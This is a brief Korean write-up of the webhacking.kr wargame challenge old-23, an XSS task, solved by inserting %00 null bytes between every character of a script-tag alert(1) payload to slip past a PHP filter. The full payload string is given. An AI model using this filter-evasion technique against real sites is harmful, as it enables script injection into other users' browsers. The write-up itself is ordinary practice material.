[webhacking.kr] old-23번

 

xss문제이다.

php환경에서 취약한 null byte injection을 통해 풀었다.

null byte injection 작동 방식: %00을 사용하는 공격

 

%00<%00s%00c%00r%00i%00p%00t%00>%00a%00l%00e%00r%00t%00(%001%00)%00;%00<%00/%00s%00c%00r%00i%00p%00t%00>%00 

해당 문자열을 넣어 풀었다.